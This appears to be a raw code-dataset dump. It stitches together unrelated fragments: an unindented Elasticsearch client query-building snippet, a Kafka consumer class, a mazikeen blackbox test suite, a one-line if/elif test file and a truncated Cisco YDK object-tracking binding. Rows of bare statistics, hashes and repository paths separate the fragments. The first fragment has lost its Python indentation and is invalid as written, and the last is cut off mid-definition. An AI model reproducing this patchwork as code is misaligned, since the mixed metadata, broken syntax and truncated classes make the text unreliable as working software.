if all_shards is not None:
__query["all_shards"] = all_shards
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if analyze_wildcard is not None:
__query["analyze_wildcard"] = analyze_wildcard
if analyzer is not None:
__query["analyzer"] = analyzer
if default_operator is not None:
__query["default_operator"] = default_operator
if df is not None:
__query["df"] = df
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if explain is not None:
__query["explain"] = explain
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if lenient is not None:
__query["lenient"] = lenient
if pretty is not None:
__query["pretty"] = pretty
if q is not None:
__query["q"] = q
if query is not None:
__body["query"] = query
if rewrite is not None:
__query["rewrite"] = rewrite
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("POST", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
| 43.059184
| 130
| 0.617273
| 16,497
| 140,416
| 4.981209
| 0.0334
| 0.028537
| 0.050928
| 0.067125
| 0.854895
| 0.836593
| 0.828038
| 0.822622
| 0.815102
| 0.802361
| 0
| 0.000061
| 0.294126
| 140,416
| 3,260
| 131
| 43.072393
| 0.829019
| 0.286691
| 0
| 0.863404
| 0
| 0
| 0.126498
| 0.038551
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021702
| false
| 0.01617
| 0.001702
| 0
| 0.045532
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
92c14609e5373991c42ac3ab97117f4c4b347370
| 3,219
|
py
|
Python
|
sakarya_stream_project/controller/consumerController/consumerController.py
|
muhammeedsari/twitter-api-middleman
|
8b3790979694af9ee9ec5a47c76d05e7e3690e96
|
[
"MIT"
] | null | null | null |
sakarya_stream_project/controller/consumerController/consumerController.py
|
muhammeedsari/twitter-api-middleman
|
8b3790979694af9ee9ec5a47c76d05e7e3690e96
|
[
"MIT"
] | null | null | null |
sakarya_stream_project/controller/consumerController/consumerController.py
|
muhammeedsari/twitter-api-middleman
|
8b3790979694af9ee9ec5a47c76d05e7e3690e96
|
[
"MIT"
] | null | null | null |
from core.confluentKafka.kafka import Kafka
import simplejson as json
class ConsumerController:
    # Each consume_* method differs only in the Kafka topic it reads, so the
    # shared poll/decode/print loop lives in a single private helper.
    def _consume(self, topic):
        kafka = Kafka()
        consumer = kafka.create_consumer(topic=topic, group_id="test")
        while True:
            try:
                msg = consumer.poll()
                if msg is None:
                    continue
                if msg.error():
                    print("Consumer error: {}".format(msg.error()))
                    continue
                json_data = json.loads(msg.value().decode("utf-8"))
                print(json_data)
            except Exception as err:
                print(f"something went wrong: {err}")
    def consume_tweets(self):
        self._consume("sentiment_topic")
    def consume_tweets_agg(self):
        self._consume("sentiment_agg_topic")
    def consume_tweets_word_agg(self):
        self._consume("sentiment_word_agg_topic")
    def consume_tweets_agg_groupby(self):
        self._consume("sentiment_agg_groupby_topic")
    def consume_tweets_agg_word2(self):
        self._consume("sentiment_word_agg_topic2")
| 30.084112
| 94
| 0.501087
| 326
| 3,219
| 4.812883
| 0.159509
| 0.031867
| 0.050988
| 0.070108
| 0.918419
| 0.918419
| 0.918419
| 0.918419
| 0.918419
| 0.883365
| 0
| 0.003625
| 0.400124
| 3,219
| 107
| 95
| 30.084112
| 0.808907
| 0
| 0
| 0.833333
| 0
| 0
| 0.130435
| 0.023602
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064103
| false
| 0
| 0.025641
| 0
| 0.102564
| 0.192308
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13288b52d8d7b36e975cc608d05fc93a2bcd3368
| 10,902
|
py
|
Python
|
tests/Blackbox_test.py
|
hanniballar/mazikeen
|
68693a96c69376f18c21576a610470a543a89316
|
[
"MIT"
] | null | null | null |
tests/Blackbox_test.py
|
hanniballar/mazikeen
|
68693a96c69376f18c21576a610470a543a89316
|
[
"MIT"
] | 3
|
2021-04-05T17:14:21.000Z
|
2021-04-06T21:49:41.000Z
|
tests/Blackbox_test.py
|
hanniballar/mazikeen
|
68693a96c69376f18c21576a610470a543a89316
|
[
"MIT"
] | null | null | null |
import unittest
import subprocess
import os
import re
import platform
from mazikeen.Utils import diff, rmtree, diffStrategy
from xmldiff import main
from distutils.dir_util import copy_tree
class Blackbox(unittest.TestCase):
def test_simple(self):
testDir = "TestFiles/Blackbox_test/simple/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_cmdArg_ScriptName(self):
testDir = "TestFiles/Blackbox_test/cmdArg_ScriptName/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "--scriptName", "dummyScriptName.yaml"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_inputFileNoutputFile(self):
testDir = "TestFiles/Blackbox_test/inputFileNoutputFile/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_blockinBlock(self):
testDir = "TestFiles/Blackbox_test/blockinBlock/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_testsuitsNtestcases_simple(self):
testDir = "TestFiles/Blackbox_test/testsuitsNtestcases/"
outDir = testDir + "TestOutput/simple/"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/simple/mazikenout.txt", testDir + "TestExpected/simple/mazikenout.txt", ignore = ["process time: .*"]))
def test_testsuitsNtestcases_report(self):
testDir = "TestFiles/Blackbox_test/testsuitsNtestcases/"
outDir = testDir + "TestOutput/report"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "-r", "TestOutput/report/report.xml"], stdout=of, stderr=of, cwd = testDir)
with open(outDir + "/report.xml", "r") as ifile:
with open(outDir + "/report_diff.xml", "w") as ofile:
for line in ifile:
line = re.sub(r"time=\".+?\"", "time=\"\"", line)
line = re.sub(r"\\", "/", line)
ofile.write(line)
self.assertEqual(main.diff_files(testDir + "TestOutput/report/report_diff.xml", testDir + "TestExpected/report/report_diff.xml"), [])
def test_testsuitsNtestcases_wait_parallel(self):
testDir = "TestFiles/Blackbox_test/testsuitsNtestcases_wait/"
outDir = testDir + "TestOutput/parallel/"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "-r", "TestOutput/parallel/report.xml", "-j", "2"], stdout=of, stderr=of, cwd = testDir)
with open(outDir + "/report.xml", "r") as ifile:
with open(outDir + "/report_diff.xml", "w") as ofile:
for line in ifile:
line = re.sub(r"time=\".+?\"", "time=\"\"", line)
line = re.sub(r"\\", "/", line)
ofile.write(line)
        self.assertEqual(main.diff_files(testDir + "TestOutput/parallel/report_diff.xml", testDir + "TestExpected/parallel/report_diff.xml"), [])
self.assertTrue(diff(testDir + "TestOutput/parallel/mazikenout.txt", testDir + "TestExpected/parallel/mazikenout.txt", ignore = ["process time: .*"]))
def test_testsuitsNtestcases_waitNfail_parallel(self):
testDir = "TestFiles/Blackbox_test/testsuitsNtestcases_waitNfail/"
outDir = testDir + "TestOutput/parallel/"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "-r", "TestOutput/parallel/report.xml", "-j", "2"], stdout=of, stderr=of, cwd = testDir)
with open(outDir + "/report.xml", "r") as ifile:
with open(outDir + "/report_diff.xml", "w") as ofile:
for line in ifile:
line = re.sub(r"time=\".+?\"", "time=\"\"", line)
line = re.sub(r"\\", "/", line)
ofile.write(line)
        self.assertEqual(main.diff_files(testDir + "TestOutput/parallel/report_diff.xml", testDir + "TestExpected/parallel/report_diff.xml"), [])
self.assertTrue(diff(testDir + "TestOutput/parallel/mazikenout.txt", testDir + "TestExpected/parallel/mazikenout.txt", ignore = ["process time: .*"]))
def test_testsuitsNtestcases_waitNfail_serial(self):
testDir = "TestFiles/Blackbox_test/testsuitsNtestcases_waitNfail/"
outDir = testDir + "TestOutput/serial/"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "-r", "TestOutput/serial/report.xml", "-j", "2"], stdout=of, stderr=of, cwd = testDir)
with open(outDir + "/report.xml", "r") as ifile:
with open(outDir + "/report_diff.xml", "w") as ofile:
for line in ifile:
line = re.sub(r"time=\".+?\"", "time=\"\"", line)
line = re.sub(r"\\", "/", line)
ofile.write(line)
        self.assertEqual(main.diff_files(testDir + "TestOutput/serial/report_diff.xml", testDir + "TestExpected/serial/report_diff.xml"), [])
self.assertTrue(diff(testDir + "TestOutput/serial/mazikenout.txt", testDir + "TestExpected/serial/mazikenout.txt", ignore = ["process time: .*"]))
def test_testsuitsNtestcases_waitNfail_failFast(self):
testDir = "TestFiles/Blackbox_test/testsuitsNtestcases_waitNfail/"
outDir = testDir + "TestOutput/failFast/"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "-r", "TestOutput/failFast/report.xml", "-j", "2", "--failfast"], stdout=of, stderr=of, cwd = testDir)
with open(outDir + "/report.xml", "r") as ifile:
with open(outDir + "/report_diff.xml", "w") as ofile:
for line in ifile:
line = re.sub(r"time=\".+?\"", "time=\"\"", line)
line = re.sub(r"\\", "/", line)
ofile.write(line)
        self.assertEqual(main.diff_files(testDir + "TestOutput/failFast/report_diff.xml", testDir + "TestExpected/failFast/report_diff.xml"), [])
self.assertTrue(diff(testDir + "TestOutput/failFast/mazikenout.txt", testDir + "TestExpected/failFast/mazikenout.txt", ignore = ["process time: .*"]))
def test_upgradeScriptData1_0_0(self):
testDir = "TestFiles/Blackbox_test/upgradeScriptData1.0.0/"
outDir = testDir + "TestOutput/"
rmtree(outDir)
os.makedirs(outDir)
copy_tree(testDir+"TestInput", outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "--upgradeScriptFile"], stdout=of, stderr=of, cwd = outDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
self.assertTrue(diff(testDir + "TestOutput/script.yaml", testDir + "TestExpected/script.yaml"))
def test_upgradeScriptData1_1_0(self):
testDir = "TestFiles/Blackbox_test/upgradeScriptData1.1.0/"
outDir = testDir + "TestOutput/"
rmtree(outDir)
os.makedirs(outDir)
copy_tree(testDir+"TestInput", outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen", "--upgradeScriptFile"], stdout=of, stderr=of, cwd = outDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
self.assertTrue(diff(testDir + "TestOutput/script.yaml", testDir + "TestExpected/script.yaml"))
def test_emptyTest(self):
testDir = "TestFiles/Blackbox_test/emptyTest/"
outDir = testDir + "TestOutput/"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_shellWindows(self):
if (platform.system() == "Windows"):
testDir = "TestFiles/Blackbox_test/shellWin/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_shellLinux(self):
if (platform.system() == "Linux"):
testDir = "TestFiles/Blackbox_test/shellLinux/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
def test_shellPython(self):
testDir = "TestFiles/Blackbox_test/shellPython/"
outDir = testDir + "TestOutput"
rmtree(outDir)
os.makedirs(outDir)
with open(outDir + "/mazikenout.txt", "w") as of:
subprocess.run(["mazikeen"], stdout=of, stderr=of, cwd = testDir)
self.assertTrue(diff(testDir + "TestOutput/mazikenout.txt", testDir + "TestExpected/mazikenout.txt", ignore = ["process time: .*"]))
if __name__ == '__main__':
unittest.main()
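# Consolidation sketch (hypothetical, not wired into the tests above): the
# report-normalization loop repeated in the report/parallel/serial/failFast
# tests could be extracted into one helper, e.g.:
#
#     def normalize_report(outDir):
#         # Blank out timing attributes and normalize path separators so the
#         # generated report can be diffed against the checked-in expectation.
#         with open(outDir + "/report.xml", "r") as ifile:
#             with open(outDir + "/report_diff.xml", "w") as ofile:
#                 for line in ifile:
#                     line = re.sub(r"time=\".+?\"", "time=\"\"", line)
#                     line = re.sub(r"\\", "/", line)
#                     ofile.write(line)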
| 53.180488
| 158
| 0.609888
| 1,159
| 10,902
| 5.664366
| 0.07679
| 0.091089
| 0.055446
| 0.064737
| 0.860625
| 0.836253
| 0.829551
| 0.798172
| 0.786748
| 0.754303
| 0
| 0.001924
| 0.237021
| 10,902
| 204
| 159
| 53.441176
| 0.787329
| 0
| 0
| 0.709497
| 0
| 0
| 0.291873
| 0.170061
| 0
| 0
| 0
| 0
| 0.122905
| 1
| 0.089385
| false
| 0
| 0.044693
| 0
| 0.139665
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13523ba9882c401ba6a35ea1823238e4454e5bac
| 40
|
py
|
Python
|
ast/testdata/if_elif.py
|
MaxTurchin/pycopy-lib
|
d7a69fc2a28031e2ca475c29239f715c1809d8cc
|
[
"PSF-2.0"
] | 126
|
2019-07-19T14:42:41.000Z
|
2022-03-21T22:22:19.000Z
|
ast/testdata/if_elif.py
|
MaxTurchin/pycopy-lib
|
d7a69fc2a28031e2ca475c29239f715c1809d8cc
|
[
"PSF-2.0"
] | 38
|
2019-08-28T01:46:31.000Z
|
2022-03-17T05:46:51.000Z
|
ast/testdata/if_elif.py
|
MaxTurchin/pycopy-lib
|
d7a69fc2a28031e2ca475c29239f715c1809d8cc
|
[
"PSF-2.0"
] | 55
|
2019-08-02T09:32:33.000Z
|
2021-12-22T11:25:51.000Z
|
if 1:
2
elif 3:
4
elif 5:
6
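# Illustrative sketch (separate from the testdata above): parsing a snippet
# like this with CPython's `ast` module shows that each `elif` becomes a
# nested `ast.If` node in the parent's `orelse` list.
#
#     import ast
#     source = "if 1:\n    2\nelif 3:\n    4\nelif 5:\n    6\n"
#     print(ast.dump(ast.parse(source)))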
| 5.714286
| 7
| 0.4
| 9
| 40
| 1.777778
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.315789
| 0.525
| 40
| 6
| 8
| 6.666667
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13b8e6e63e1d8c6fcb24f19e81cab2834eb8ed0d
| 290,887
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_manageability_object_tracking_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_manageability_object_tracking_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_manageability_object_tracking_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_manageability_object_tracking_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR manageability\-object\-tracking package operational data.
This module contains definitions
for the following management objects\:
object\-tracking\: Object Tracking operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Track(Enum):
"""
Track (Enum Class)
Track
.. data:: interface_type = 1
Line protocol type
.. data:: route_type = 2
Route type
.. data:: bool_and_type = 3
Boolean and type
.. data:: bool_or_type = 4
Boolean or type
.. data:: ipsla_type = 5
Ipsla track type
.. data:: undefined_type = 6
type undefined
.. data:: threshold_weight = 7
type threshold weight
.. data:: threshold_percentage = 8
type threshold percentage
.. data:: bfd_type = 9
type bfd rtr
"""
interface_type = Enum.YLeaf(1, "interface-type")
route_type = Enum.YLeaf(2, "route-type")
bool_and_type = Enum.YLeaf(3, "bool-and-type")
bool_or_type = Enum.YLeaf(4, "bool-or-type")
ipsla_type = Enum.YLeaf(5, "ipsla-type")
undefined_type = Enum.YLeaf(6, "undefined-type")
threshold_weight = Enum.YLeaf(7, "threshold-weight")
threshold_percentage = Enum.YLeaf(8, "threshold-percentage")
bfd_type = Enum.YLeaf(9, "bfd-type")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['Track']
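# Usage sketch (illustrative, not part of the generated bindings): reading
# this operational model from a device with YDK's CRUD service. The address
# and credentials are placeholders.
#
#     from ydk.services import CRUDService
#     from ydk.providers import NetconfServiceProvider
#
#     provider = NetconfServiceProvider(address="198.51.100.1",
#                                       username="admin", password="admin")
#     crud = CRUDService()
#     tracking = crud.read(provider, ObjectTracking())
#     for info in tracking.track_type_interface.track_info:
#         print(info.tracke_name, info.track_state)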
class ObjectTracking(_Entity_):
"""
Object Tracking operational data
.. attribute:: track_type_interface
Object Tracking Type interface info
**type**\: :py:class:`TrackTypeInterface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface>`
**config**\: False
.. attribute:: track_briefs
Object Tracking Track table brief
**type**\: :py:class:`TrackBriefs <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs>`
**config**\: False
.. attribute:: track_type_rtr_reachability
Object Tracking Type RTR Reachability info
**type**\: :py:class:`TrackTypeRtrReachability <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability>`
**config**\: False
.. attribute:: track_type_rtr_reachability_brief
Object Tracking Type RTR Reachability brief info
**type**\: :py:class:`TrackTypeRtrReachabilityBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief>`
**config**\: False
.. attribute:: tracks
Object Tracking Track table
**type**\: :py:class:`Tracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks>`
**config**\: False
.. attribute:: track_type_ipv4_route_brief
Object Tracking Type Ipv4 Route brief info
**type**\: :py:class:`TrackTypeIpv4RouteBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief>`
**config**\: False
.. attribute:: track_type_ipv4_route
Object Tracking Type IPV4 route info
**type**\: :py:class:`TrackTypeIpv4Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route>`
**config**\: False
.. attribute:: track_type_interface_brief
Object Tracking Type Interface brief info
**type**\: :py:class:`TrackTypeInterfaceBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking, self).__init__()
self._top_entity = None
self.yang_name = "object-tracking"
self.yang_parent_name = "Cisco-IOS-XR-manageability-object-tracking-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-interface", ("track_type_interface", ObjectTracking.TrackTypeInterface)), ("track-briefs", ("track_briefs", ObjectTracking.TrackBriefs)), ("track-type-rtr-reachability", ("track_type_rtr_reachability", ObjectTracking.TrackTypeRtrReachability)), ("track-type-rtr-reachability-brief", ("track_type_rtr_reachability_brief", ObjectTracking.TrackTypeRtrReachabilityBrief)), ("tracks", ("tracks", ObjectTracking.Tracks)), ("track-type-ipv4-route-brief", ("track_type_ipv4_route_brief", ObjectTracking.TrackTypeIpv4RouteBrief)), ("track-type-ipv4-route", ("track_type_ipv4_route", ObjectTracking.TrackTypeIpv4Route)), ("track-type-interface-brief", ("track_type_interface_brief", ObjectTracking.TrackTypeInterfaceBrief))])
self._leafs = OrderedDict()
self.track_type_interface = ObjectTracking.TrackTypeInterface()
self.track_type_interface.parent = self
self._children_name_map["track_type_interface"] = "track-type-interface"
self.track_briefs = ObjectTracking.TrackBriefs()
self.track_briefs.parent = self
self._children_name_map["track_briefs"] = "track-briefs"
self.track_type_rtr_reachability = ObjectTracking.TrackTypeRtrReachability()
self.track_type_rtr_reachability.parent = self
self._children_name_map["track_type_rtr_reachability"] = "track-type-rtr-reachability"
self.track_type_rtr_reachability_brief = ObjectTracking.TrackTypeRtrReachabilityBrief()
self.track_type_rtr_reachability_brief.parent = self
self._children_name_map["track_type_rtr_reachability_brief"] = "track-type-rtr-reachability-brief"
self.tracks = ObjectTracking.Tracks()
self.tracks.parent = self
self._children_name_map["tracks"] = "tracks"
self.track_type_ipv4_route_brief = ObjectTracking.TrackTypeIpv4RouteBrief()
self.track_type_ipv4_route_brief.parent = self
self._children_name_map["track_type_ipv4_route_brief"] = "track-type-ipv4-route-brief"
self.track_type_ipv4_route = ObjectTracking.TrackTypeIpv4Route()
self.track_type_ipv4_route.parent = self
self._children_name_map["track_type_ipv4_route"] = "track-type-ipv4-route"
self.track_type_interface_brief = ObjectTracking.TrackTypeInterfaceBrief()
self.track_type_interface_brief.parent = self
self._children_name_map["track_type_interface_brief"] = "track-type-interface-brief"
self._segment_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking, [], name, value)
class TrackTypeInterface(_Entity_):
"""
Object Tracking Type interface info
.. attribute:: track_info
track info
**type**\: list of :py:class:`TrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface, self).__init__()
self.yang_name = "track-type-interface"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-info", ("track_info", ObjectTracking.TrackTypeInterface.TrackInfo))])
self._leafs = OrderedDict()
self.track_info = YList(self)
self._segment_path = lambda: "track-type-interface"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface, [], name, value)
class TrackInfo(_Entity_):
"""
track info
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo>`
**config**\: False
.. attribute:: bool_tracks
boolean objects
**type**\: :py:class:`BoolTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks>`
**config**\: False
.. attribute:: threshold_tracks
Threshold objects
**type**\: :py:class:`ThresholdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks>`
**config**\: False
.. attribute:: tracking_interaces
Tracking Interfaces
**type**\: :py:class:`TrackingInteraces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces>`
**config**\: False
.. attribute:: delayed
Is the state change delay counter in progress
**type**\: :py:class:`Delayed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.Delayed>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: state_change_counter
State Change Counter
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seconds_last_change
Seconds Last Change
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
**units**\: second
.. attribute:: threshold_up
User specified threshold upper limit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_down
User specified threshold lower limit
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo, self).__init__()
self.yang_name = "track-info"
self.yang_parent_name = "track-type-interface"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo)), ("bool-tracks", ("bool_tracks", ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks)), ("threshold-tracks", ("threshold_tracks", ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks)), ("tracking-interaces", ("tracking_interaces", ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces)), ("delayed", ("delayed", ObjectTracking.TrackTypeInterface.TrackInfo.Delayed))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
